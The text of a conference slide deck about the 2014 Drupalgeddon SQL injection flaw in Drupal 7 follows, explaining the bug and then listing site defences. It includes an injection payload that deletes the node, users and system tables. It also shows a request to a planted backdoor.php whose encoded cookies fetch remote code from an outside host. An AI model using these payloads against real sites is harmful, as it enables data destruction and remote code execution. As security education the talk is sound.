I Survived Drupalgeddon

I'm Matt Korostoff

I work for FFW

(and you should too)

Some
Background

The Problem

A normal query

<?php

//A normal database query
$nid = 123;
db_query(
  "SELECT title FROM {node} WHERE nid = :nids",
  array(':nid' => $nid)
);

A normal query, with multiple arguments

<?php

$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nid' => $nids)
);

A normal query, with multiple arguments, expanded

<?php

$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids_0, :nids_1, :nids_2)",
  array(':nids_0, :nids_1, :nids_2' => $nid)
);

A malicious query

<?php
$nids = array(
  ";DELETE FROM node;" => 123,
  ";DELETE FROM users;" => 456,
  ";DELETE FROM system;" => 489
);

db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nid' => $nids)
);

Hacking time!

We Will:

  • Inject SQL

  • Execute Code

  • Upload files

Step 1.

Insert a row in menu_router

Step 2.

Get arbitrary code execution

Using Backdoor.php

GET /modules/poll/backdoor.php HTTP/1.1
Host: exploited.com
Cookie: Kcqf3=base64_decode;  Kcqf2=cHJlZ19yZXBsYWNl; Kcqf1=ZmlsZV9nZXRfY29udGVudHMoIm1hdHRrb3Jvc3RvZmYuY29tL3VwbG9hZGVyLnBocCIp

Step 3.

Get file upload access

Defending
Your
Site

Drupal 7.32+
Drupal 8-beta2+

Set proper file permissions

Host with professionals

Acquia
Pantheon
platform.sh
Black Mesh

Take AUTOMATED nightly backups

#Backup database
0 2 * * * drush @yoursite sql-dump > /path/to/$(date +\%Y\%m\%d\%H\%M\%S).sql

Store your code in version control

Make sure cron is running

* */2 * * * drush @yoursite cron

Upgrade to php 5.5+

Automate security patches 

#Without git
0 */2 * * * drush @yoursite up -y --security

#With git
0 */2 * * * cd /path/to/your/repository/ && 
            drush up --security -y && 
            git commit -am 'Automatic security update' && 
            git push origin master

Drop post traffic in Varnish

#VCL
if (req.request == "POST") {
    error 404 "No";
}


#.htaccess
Deny from all
Allow from 123.123.123.123

Was this really "Drupalgeddon"?

Thanks!

I Survived Drupalgeddon

By Matt Korostoff

I Survived Drupalgeddon

  • 1,850